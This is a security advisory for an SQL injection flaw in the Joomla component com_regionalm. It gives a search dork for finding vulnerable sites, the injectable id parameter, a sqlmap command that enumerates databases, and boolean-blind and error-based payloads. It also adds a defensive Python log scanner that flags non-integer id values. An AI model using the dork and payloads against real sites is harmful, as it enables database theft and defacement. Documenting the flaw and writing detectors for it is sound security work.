Joomla! Com_regionalm SQL Injection

2018.12.17
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Author : Security007
Tested on : ubuntu 18.04
Vendor Homepage : http://www.joomla.org
Dork : inurl:index.php?option=com_regionalm
Parameter : id (GET)
Injection point : http://localhost/index.php?option=com_regionalm&task=regionalmuseum&id=12[ Inject Here ]&Itemid=139&lang=en

Proof Of Concept:

sqlmap -u "http://localhost/index.php?option=com_regionalm&task=regionalmuseum&id=12&Itemid=139&lang=en " --risk=3 --level=5 --random-agent --dbs -p id

Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (DUAL)
    Payload: option=com_regionalm&task=regionalmuseum&id=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_regionalm&task=regionalmuseum&id=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
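A log-review check derived from the payloads above, as an added example that is not part of the original advisory: it scans web-server access logs for com_regionalm requests whose id value is not a plain integer. The log lines are constructed, and the rule that legitimate id values are all digits is an assumption based on the id=12 in the advisory's URL.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic). The second line
# carries the advisory's boolean-based payload, URL-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Dec/2018:10:00:01 +0000] "GET /index.php?option=com_regionalm&task=regionalmuseum&id=12&Itemid=139&lang=en HTTP/1.1" 200 5120
203.0.113.9 - - [17/Dec/2018:10:00:07 +0000] "GET /index.php?option=com_regionalm&task=regionalmuseum&id=(CASE%20WHEN%20(1573=1573)%20THEN%201573%20ELSE%201573*(SELECT%201573%20FROM%20DUAL%20UNION%20SELECT%209674%20FROM%20DUAL)%20END) HTTP/1.1" 200 5120
203.0.113.9 - - [17/Dec/2018:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=7:news HTTP/1.1" 200 812
"""

# Client address, then the request target inside the quoted request line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate id for this component is a short run of ASCII digits.
INTEGER_RE = re.compile(r"[0-9]{1,10}")


def suspicious_requests(log_text, component="com_regionalm", param="id"):
    """Return (client, decoded_value) for requests to `component` whose
    `param` value is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not an access-log request line
        client, target = match.groups()
        try:
            query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        except ValueError:
            continue  # malformed target that urlsplit refuses to parse
        if component not in query.get("option", []):
            continue  # other components may use non-numeric ids legitimately
        for value in query.get(param, []):
            if not INTEGER_RE.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client}: non-integer id for com_regionalm: {value!r}")
```

Both payload types in the advisory replace the whole id value with an SQL expression, so an integer-only check on the decoded parameter catches either without needing per-payload signatures.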

References:

https://defacementsec007.blogspot.com/2018/12/joomla-comregionalm-sql-injection-0day.html


Copyright 2019, cxsecurity.com

 
